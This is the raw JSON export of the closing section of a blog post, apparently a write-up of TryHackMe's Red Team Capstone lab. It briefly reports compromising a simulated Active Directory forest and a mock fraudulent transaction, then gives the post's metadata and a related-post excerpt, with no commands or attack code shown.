\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Approving the transaction confirms that we have successfully achieved the goal for this challenge! Not only have we compromised the entire AD Forest with three Domain Controllers, but we have also made a fraudulent transaction to show the further impact of the compromise.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"35-conclusion-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h2>\n\n\n\n<p>Phew! This has been a wild ride. This was the best Red Teaming lab I&#8217;ve worked on so far. Thanks to TryHackMe for this opportunity to practice our red teaming skills. Apart from some frustrating moments&#8211;mostly due to other users changing\/deleting the accounts and passwords&#8211;I have thoroughly enjoyed working on this assignment.<\/p>\n\n\n\n<p>In this blog, I have only included the direct path with the least number of steps needed to complete the challenge. There are other attack vectors, and there may be an even easier way to complete the task. Feel free to ask any questions or reach out if you need any help regarding this lab. 
<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[45,1,49,11,44,12],"tags":[],"class_list":["post-447","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-blog","category-ctf","category-ctf-write-ups","category-red-teaming","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":447,"position":0},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. 
We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026"}]}